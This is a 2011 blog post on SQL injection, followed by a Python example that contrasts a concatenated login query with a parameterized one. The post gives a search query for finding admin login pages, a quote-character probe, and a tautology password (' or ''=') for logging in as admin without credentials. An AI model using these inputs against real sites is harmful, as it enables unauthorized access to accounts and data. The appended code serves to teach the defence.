
Wednesday, June 1, 2011

SQL INJECTION


Old as well as new websites lack security and are prone to several loopholes; one such vulnerability is SQL injection.
This post covers what SQL injection is and how it can be used to make a website grant access as an admin, able to monitor all tasks and events, without actually knowing the password.


Test for SQL injection vulnerability:
Search for Inurl:\ adminlogin 
Username:  ‘
Password :  =
Error:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near '='.
/logincheck.asp, line 6


If it returns an error, whether error 505 or any other sort, that indicates the site has an SQL injection vulnerability.

Then here is how you will be able to access its domain:

Username :  admin

Password:  ‘or ’ ’=‘
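
Why these inputs work against a login check that builds its query by string concatenation, and why a parameterized query stops them, shown as an added example that is not code from the original post. It assumes a hypothetical users table in an in-memory SQLite database standing in for the site's SQL Server backend; the function names and the stored password are constructed, and the password input is the one above written with straight quotes and no inner space.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's user table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext only to mirror a legacy login check; store salted hashes in practice.
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret-constructed')")
    return db

def login_concatenated(db, username, password):
    """Vulnerable pattern: user input is pasted into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None, None
    except sqlite3.Error as exc:
        # Counterpart of the '80040e14' syntax error shown to the visitor.
        return False, str(exc)

def login_parameterized(db, username, password):
    """Hardened pattern: input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None, None

def compare(username, password):
    """Run both checks on the same input: (concatenated, parameterized)."""
    db = make_db()
    try:
        return (login_concatenated(db, username, password),
                login_parameterized(db, username, password))
    finally:
        db.close()

if __name__ == "__main__":
    cases = [("admin", "S3cret-constructed"),  # legitimate login
             ("'", "="),                       # the quote test from the post
             ("admin", "' or ''='")]           # the always-true password
    for user, pw in cases:
        weak, safe = compare(user, pw)
        print(f"{user!r} / {pw!r}: concatenated={weak} parameterized={safe}")
```

With bound parameters the quote test produces no database error and the always-true password is compared as an ordinary string, so both are rejected as failed logins.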



